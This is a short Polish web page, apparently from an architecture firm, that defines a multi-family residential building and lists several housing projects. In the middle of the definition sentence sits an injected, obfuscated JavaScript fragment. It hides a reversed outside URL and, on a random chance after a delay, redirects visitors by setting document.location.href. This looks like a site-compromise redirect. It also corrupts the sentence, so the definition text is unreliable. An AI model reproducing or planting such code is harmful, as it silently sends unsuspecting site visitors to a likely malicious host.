informacje *>

Definicja budynku wielorodzinnego

przepisy nie określają definicji budynków wielorodzinnych, budynki służące zaspokajaniu potrzeb mieszkaniowych zgodnie z przepisami (PB i WT) dzielimy na jednorodzinne i wielorodzinne. Bazując na definicji budynku jednorodzinnego przyjmujemy, że budynek mieszkalny wielorodzinny, stanowiący konstrukcyjnie samodzielną całość, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to taki w którym dopuszcza się wydzielenie więcej niż dwóch lokali mieszkalnych. 

OSIEDLE WIELORODZINNE, UL.AUGUSTÓWKA

BUDYNEK WIELORODZINNY AL.KEN

BUDYNEK WIELORODZINNY W ELBLĄGU, UL.GR.ŚW.JERZEGO

BUDYNEK  PRZY UL. EKOLOGICZNEJ

BUDYNEK UL. EKOLOGICZNEJ

BUDYNEK  PRZY UL. EKOLOGICZNEJ

BUDYNEK WIELORODZINNY UL. KOKOSOWEJ

ZWM

BUDYNEK WIELORODZINNY UL.ZWIĄZKU WALKI MŁODYCH

ZWM

BUDYNEK PLOMBA UL.RYBAŁTÓW

OSIEDLE BUDYNKÓW UL.PŁASKOWICKIEJ

OSIEDLE BUDYNKÓW WIELORODZINNYCH W RZESZOWIE